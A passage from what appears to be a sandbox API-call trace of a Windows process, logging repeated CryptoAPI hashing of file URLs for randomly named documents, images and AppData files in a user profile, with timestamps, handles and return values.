(_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots") returned 0x43 [0086.022] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x88, dwFlags=0x0) returned 1 [0086.022] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.022] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots") returned 0x43 [0086.022] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots/") returned 0x44 [0086.022] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.022] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.022] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx") returned 0x44 [0086.022] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx") returned 0x44 [0086.022] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.022] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.022] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx") returned 0x44 [0086.022] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx/") returned 0x45 [0086.022] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0086.022] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.022] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg") returned 0x6a [0086.022] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg") returned 0x6a [0086.022] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd6, dwFlags=0x0) returned 1 [0086.022] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.022] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg") returned 0x6a [0086.022] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.022] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg/") returned 0x6b [0086.022] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xd8, dwFlags=0x0) returned 1 [0086.022] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.023] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf") returned 0x4d [0086.023] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf") returned 0x4d [0086.023] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x9c, dwFlags=0x0) returned 1 [0086.023] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.023] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf") returned 0x4d [0086.023] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf/") returned 0x4e [0086.023] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x9e, dwFlags=0x0) returned 1 [0086.023] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.023] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf") returned 0x3e [0086.023] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf") returned 0x3e [0086.023] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0086.023] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.023] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf") returned 0x3e [0086.023] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf/") returned 0x3f [0086.023] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.023] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.023] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx") returned 0x3d [0086.023] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx") returned 0x3d [0086.023] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0086.023] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.023] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx") returned 0x3d [0086.023] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.023] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx/") returned 0x3e [0086.023] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0086.023] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.023] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf") returned 0x3e [0086.024] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf") returned 0x3e [0086.024] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0086.024] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.024] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf") returned 0x3e [0086.024] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf/") returned 0x3f [0086.024] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.024] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.024] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx") returned 0x5c [0086.024] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx") returned 0x5c [0086.024] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xba, dwFlags=0x0) returned 1 [0086.024] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.024] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx") returned 0x5c [0086.024] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx/") returned 0x5d [0086.024] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xbc, dwFlags=0x0) returned 1 [0086.024] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.024] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf") returned 0x40 [0086.024] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf") returned 0x40 [0086.024] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.024] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.024] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf") returned 0x40 [0086.024] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.024] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf/") returned 0x41 [0086.025] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 1 [0086.025] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.025] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif") returned 0x40 [0086.025] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif") returned 0x40 [0086.025] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.025] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.025] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif") returned 0x40 [0086.025] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif/") returned 0x41 [0086.025] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 1 [0086.025] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.025] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt") returned 0x3f [0086.025] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt") returned 0x3f [0086.025] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x80, dwFlags=0x0) returned 1 [0086.025] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.025] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt") returned 0x3f [0086.025] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt/") returned 0x40 [0086.025] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.025] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.025] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv") returned 0x40 [0086.025] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv") returned 0x40 [0086.025] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x82, dwFlags=0x0) returned 1 [0086.025] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.025] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv") returned 0x40 [0086.025] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv/") returned 0x41 [0086.025] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 1 [0086.025] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.025] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.025] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp") returned 0x3d [0086.026] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.026] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp") returned 0x3d [0086.026] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0086.026] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.026] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.026] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp") returned 0x3d [0086.026] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.026] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp/") returned 0x3e [0086.026] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0086.026] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.026] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.026] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf") returned 0x64 [0086.026] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.026] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf") returned 0x64 [0086.026] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xca, dwFlags=0x0) returned 1 [0086.026] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.026] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.026] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf") returned 0x64 [0086.028] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.029] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf/") returned 0x65 [0086.029] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xcc, dwFlags=0x0) returned 1 [0086.029] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.029] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.029] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png") returned 0x44 [0086.029] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.029] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png") returned 0x44 [0086.029] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0086.029] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.029] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.029] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png") returned 0x44 [0086.029] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.029] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png/") returned 0x45 [0086.029] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0086.029] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.029] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.029] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx") returned 0x42 [0086.029] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.029] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx") returned 0x42 [0086.029] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x86, dwFlags=0x0) returned 1 [0086.029] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.029] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.029] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx") returned 0x42 [0086.029] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.029] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx/") returned 0x43 [0086.029] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x88, dwFlags=0x0) returned 1 [0086.029] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.029] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.029] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png") returned 0x4a [0086.029] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.029] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png") returned 0x4a [0086.029] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x96, dwFlags=0x0) returned 1 [0086.029] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.030] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png") returned 0x4a [0086.030] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png/") returned 0x4b [0086.030] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x98, dwFlags=0x0) returned 1 [0086.030] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.030] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc") returned 0x38 [0086.030] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc") returned 0x38 [0086.030] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x72, dwFlags=0x0) returned 1 [0086.030] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.030] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc") returned 0x38 [0086.030] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.030] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc/") returned 0x39 [0086.030] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x74, dwFlags=0x0) returned 1 [0086.030] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, 